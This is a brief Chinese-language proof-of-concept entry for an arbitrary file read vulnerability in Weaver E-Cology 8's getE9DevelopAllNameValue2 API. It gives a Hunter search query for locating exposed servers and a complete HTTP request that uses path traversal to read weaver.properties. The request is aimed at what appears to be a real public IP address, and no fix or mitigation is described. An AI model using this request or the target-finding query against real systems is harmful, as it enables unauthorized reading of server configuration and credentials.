泛微E-Cology 8 getE9DevelopAllNameValue2存在任意文件读取漏洞
一、漏洞简介
泛微新一代移动办公平台e-cology8.0不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微E-Cology 8 getE9DevelopAllNameValue2存在任意文件读取漏洞。
二、影响版本
- 泛微e-cology 8
三、资产测绘
- hunter
app.name="泛微 e-cology OA" - 特征
四、漏洞复现
GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_/../weaver.properties HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Host: 106.119.166.213:9999
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close